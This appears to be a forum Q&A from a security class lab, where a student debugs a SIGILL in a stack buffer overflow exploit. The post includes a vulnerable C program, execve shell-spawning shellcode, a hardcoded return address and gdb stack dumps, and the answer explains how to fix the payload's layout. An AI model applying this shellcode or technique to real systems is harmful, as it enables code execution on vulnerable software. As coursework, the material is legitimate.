jwineman jwineman - 2 months ago 35
C Question

Getting SIGILL when trying to execute buffer overflow attack

I'm working on my buffer overflow project for my security class, I think I have everything set up right but when I run it I get:

Program received signal SIGILL, Illegal Instruction.
0x08048500 in main(argc=4854718, argv=0x0804b008) at stack.c:22
22 fread(str,sizeof(char),517,badfile);


Heres stack.c

int bof(char *str)
{
char buffer[12];
/* The following statement has a buffer overflow problem */
strcpy(buffer, str);
return 1;
}

int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}


here is exploit.c

char code[]=

"\x31\xc0" // xorl %eax,%eax

"\x50" // pushl %eax

"\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e

"\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f

"\x89\xe3" // movl %esp,%ebx

"\x99" // cltd

"\x52" // pushl %edx

"\x53" // pushl %ebx

"\x89\xe1" // movl %esp,%ecx

"\xb0\x0b" // movb $0xb,%al

"\xcd\x80" // int $0x80

;

char retaddr[] = "\x70\xF2\xFF\xBF";

void main(int argc, char **argv)
{
char strr[517];
strr[0] = 'Z';
strr[1] = 0;
strr[2] = '\x00';
char buffer[517];
FILE *badfile;

/* Initialize buffer with 0x90 (NOP instruction) */
memset(buffer, 0x90, 517);

/* You need to fill the buffer with appropriate contents here */
//memcpy(buffer, "EGG=", 4);

memcpy(buffer, code, 24);

memcpy(buffer+20,retaddr,4);

memcpy(buffer+24,"\x00\x00\x00\x00",4);


/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer,517,1,badfile);
fclose(badfile);
}


Here is the stack at runtime.
Starting program: /home/john/stack

Breakpoint 1, bof (
str=0xbffff2b7 "1\300Phn/shh//bi\211\343\231RS\211\341p\362\377\277")
at stack.c:13
13 strcpy(buffer, str);
(gdb) x/12xw $esp
0xbffff270: 0x00000205 0xbffff298 0x004a13be 0x0804b008
0xbffff280: 0xbffff2b7 0x00000205 0xb7fef6c0 0x00584ff4
0xbffff290: 0x00000000 0x00000000 0xbffff4c8 0x0804850f
(gdb) s
14 return 1;
(gdb) x/12xw $esp
0xbffff270: 0xbffff284 0xbffff2b7 0x004a13be 0x0804b008
0xbffff280: 0xbffff2b7 0x6850c031 0x68732f6e 0x622f2f68
0xbffff290: 0x99e38969 0xe1895352 0xbffff270 0x08048500
(gdb) c
Continuing.


Any idea why I'm getting SIGILL?

Answer

Because you're executing illegal code. In your exploit.c, you're overwriting offsets 20-23 with the return address -- those bytes were previously the b0 0b cd 80 corresponding to the last two mov $0xb,%al and int $0x80 instructions. The zero bytes you put in there are illegal code.

Since the return address has to go at that specific offset for this target, you need to modify your shell code not to use that data. I'd suggest either moving the shell code to after that offset and pointing the return address there, or putting in a jump over the return address so that the processor doesn't try to execute it.